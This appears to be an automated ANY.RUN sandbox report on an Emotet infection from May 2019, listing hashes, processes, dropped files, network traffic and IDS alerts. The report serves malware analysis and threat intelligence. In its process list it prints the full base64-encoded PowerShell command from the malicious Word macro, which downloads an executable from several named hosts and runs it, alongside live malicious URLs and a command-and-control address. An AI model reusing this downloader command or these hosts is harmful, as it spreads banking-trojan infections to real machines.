analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://mwvisual.com/scfv/bYofxzLIBlDANzJQJhwNsOgzvfU/

Full analysis: https://app.any.run/tasks/494f7653-4ed7-447f-82cf-da06cb8b3ddc
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 20, 2019, 19:09:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
emotet
trojan
emotet-doc
Indicators:
MD5:

2BF9B832E8A2798C7BA9B37EE4E86C49

SHA1:

65AD640F82FC942A17AA3C4DA74E242A051B80C2

SHA256:

901F1C84F72A0D5509990B58817ACAA8151628C42E3570F57BEF85E51FE707DB

SSDEEP:

3:N1KTJUFKNGU8Km6UvbTr:CNxNxmzTTr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 770.exe (PID: 3184)
      • 770.exe (PID: 2656)
      • soundser.exe (PID: 304)
      • soundser.exe (PID: 560)
    • Emotet process was detected

      • soundser.exe (PID: 304)
    • Changes the autorun value in the registry

      • soundser.exe (PID: 560)
    • EMOTET was detected

      • soundser.exe (PID: 560)
    • Connects to CnC server

      • soundser.exe (PID: 560)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • chrome.exe (PID: 116)
      • WINWORD.EXE (PID: 3864)
    • Application launched itself

      • WINWORD.EXE (PID: 3864)
    • Creates files in the user directory

      • powershell.exe (PID: 2176)
    • PowerShell script executed

      • powershell.exe (PID: 2176)
    • Executed via WMI

      • powershell.exe (PID: 2176)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2176)
      • 770.exe (PID: 2656)
    • Starts itself from another location

      • 770.exe (PID: 2656)
  • INFO

    • Reads Internet Cache Settings

      • chrome.exe (PID: 116)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3864)
    • Application launched itself

      • chrome.exe (PID: 116)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3864)
      • WINWORD.EXE (PID: 2584)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
16
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winword.exe no specs winword.exe no specs powershell.exe 770.exe no specs 770.exe chrome.exe no specs #EMOTET soundser.exe no specs #EMOTET soundser.exe chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
116"C:\Program Files\Google\Chrome\Application\chrome.exe" http://mwvisual.com/scfv/bYofxzLIBlDANzJQJhwNsOgzvfU/C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
3144"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=73.0.3683.75 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x6ea50f18,0x6ea50f28,0x6ea50f34C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
1040"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3960 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
460"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=956,15379422907693368005,9165559896744267503,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwAAAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=66203899630775436 --mojo-platform-channel-handle=948 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
73.0.3683.75
1692"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=956,15379422907693368005,9165559896744267503,131072 --enable-features=PasswordImport --service-pipe-token=16433319002973562719 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=16433319002973562719 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1956 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
73.0.3683.75
2760"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=956,15379422907693368005,9165559896744267503,131072 --enable-features=PasswordImport --service-pipe-token=11167921306620372008 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=11167921306620372008 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1988 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
73.0.3683.75
3400"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=956,15379422907693368005,9165559896744267503,131072 --enable-features=PasswordImport --service-pipe-token=14846457759106036303 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=14846457759106036303 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2264 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
3864"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\INC_721743734474US_May_20_2019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEchrome.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2584"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2176powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABOAF8ANABfADAANQA3AF8APQAnAHUAMAAyAF8AOQAwACcAOwAkAFUAOQA2ADQAOQAxADcAXwAgAD0AIAAnADcANwAwACcAOwAkAHcAMwA1ADYAXwA3AD0AJwBWADEAMQAyADYAMgA5ACcAOwAkAHMANgA5ADgAMQBfADEAMgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVQA5ADYANAA5ADEANwBfACsAJwAuAGUAeABlACcAOwAkAEwAOQAwADcANAAxADQAXwA9ACcAaAA3ADcAMAAzADEAOAAnADsAJABtADAAMQA0ADkAOQAwAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdABgAC4AVwBgAEUAQgBDAGwASQBlAGAATgB0ADsAJABhADMANAAwADMANwA5AD0AJwBoAHQAdABwAHMAOgAvAC8AbwB2AGUAcgBjAHIAZQBhAHQAaQB2AGUALgBjAG8AbQAvAGMAcwBzAC8AcwBoAGUAYwBnAGUAcwBpAGEAXwBjAGoAdABmADcAcwA2AC0AMgA1ADgANgA2ADUAOAA3ADIAMAAvAEAAaAB0AHQAcAA6AC8ALwBhAG4AdABvAG4AcgBlAHMAaQBkAGUAbgB0AGkAYQBsAC4AYwBvAG0ALwB3AGsAZAByAGwAawAvAHAAYQBwAGsAYQBhADEANwAvAE4AdQBqAFUASgBlAHQATgB5AC8AQABoAHQAdABwADoALwAvAGcAYQB3AGEAaABlAHIALQBzAGUAcgB2AGkAYwBlAHMALgBjAG8AbQAvAG4AbgBnAGIAMgA0AHkALwB2AFgARwBBAHAAVwBVAHcAZAAvAEAAaAB0AHQAcAA6AC8ALwB0AGgAZQBwAHIAbwBwAGUAcgB0AHkAZABlAGEAbABlAHIAegAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADUAegBlADcAdgBzAF8AdABnAHQANgBlADMAawAtADUALwBAAGgAdAB0AHAAOgAvAC8AZwB1AGkAbQBhAHIAYQBlAHMAYwBvAG4AcwB0AHIAdQB0AG8AcgBhAHMAagBjAC4AYwBvAG0ALgBiAHIALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ATgBUAGwAVABaAHQAQQBVAEIALwAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAcwA1ADQANAAyAF8AMwA9ACcASAA1ADgANQAzADAANwBfACcAOwBmAG8AcgBlAGEAYwBoACgAJABaADEAOQA5ADEAOQA1AF8AIABpAG4AIAAkAGEAMwA0ADAAMwA3ADkAKQB7AHQAcgB5AHsAJABtADAAMQA0ADkAOQAwAC4ARABvAFcATgBsAG8AYQBkAEYAaQBsAGUAKAAkAFoAMQA5ADkAMQA5ADUAXwAsACAAJABzADYAOQA4ADEAXwAxADIAKQA7ACQAagAzADEANwBfADEAMQAwAD0AJwBxADIAOQA0ADIAMAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHMANgA5ADgAMQBfADEAMgApAC4AbABlAG4ARwBUAEgAIAAtAGcAZQAgADIAOQAyADIAOAApACAAewAmACgAJwBJAG4AdgBvAGsAZQAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACAAJABzADYAOQA4ADEAXwAxADIAOwAkAGoAOAAyADEANgA5ADcAPQAnAFYAOAAzADMANQAxACcAOwBiAHIAZQBhAGsAOwAkAG4AMAA1ADQAMgAxADUAPQAnAEMAOAA1ADQANAA1ADkANwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhADMANwA5ADUAMgA9ACcASgAwADcAOQA5ADEAOAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 415
Read events
2 852
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
12
Text files
45
Unknown types
11

Dropped files

PID
Process
Filename
Type
116chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
MD5:
SHA256:
116chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
MD5:
SHA256:
116chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
MD5:
SHA256:
116chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
MD5:
SHA256:
116chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3
MD5:
SHA256:
116chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\f83d95c4-d131-4416-aa73-a5e425c33f4d.tmp
MD5:
SHA256:
116chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000018.dbtmp
MD5:
SHA256:
116chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index
MD5:
SHA256:
116chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0
MD5:
SHA256:
116chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
12
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
116
chrome.exe
GET
200
66.147.244.151:80
http://mwvisual.com/scfv/bYofxzLIBlDANzJQJhwNsOgzvfU/
US
document
137 Kb
suspicious
560
soundser.exe
POST
200
74.207.227.96:443
http://74.207.227.96:443/walk/acquire/ringin/merge/
US
binary
148 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
116
chrome.exe
66.147.244.151:80
mwvisual.com
Unified Layer
US
suspicious
116
chrome.exe
172.217.22.67:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
116
chrome.exe
172.217.16.205:443
accounts.google.com
Google Inc.
US
whitelisted
2176
powershell.exe
69.90.66.10:443
overcreative.com
Peer 1 Network (USA) Inc.
CA
unknown
116
chrome.exe
216.58.207.68:443
www.google.com
Google Inc.
US
whitelisted
116
chrome.exe
216.58.210.3:443
ssl.gstatic.com
Google Inc.
US
whitelisted
74.207.227.96:443
Linode, LLC
US
malicious

DNS requests

Domain
IP
Reputation
clientservices.googleapis.com
  • 172.217.22.67
whitelisted
mwvisual.com
  • 66.147.244.151
suspicious
accounts.google.com
  • 172.217.16.205
shared
www.google.com
  • 216.58.207.68
whitelisted
ssl.gstatic.com
  • 216.58.210.3
whitelisted
overcreative.com
  • 69.90.66.10
unknown

Threats

PID
Process
Class
Message
116
chrome.exe
Potential Corporate Privacy Violation
ET POLICY Office Document Download Containing AutoOpen Macro
560
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
560
soundser.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
3 ETPRO signatures available at the full report
No debug info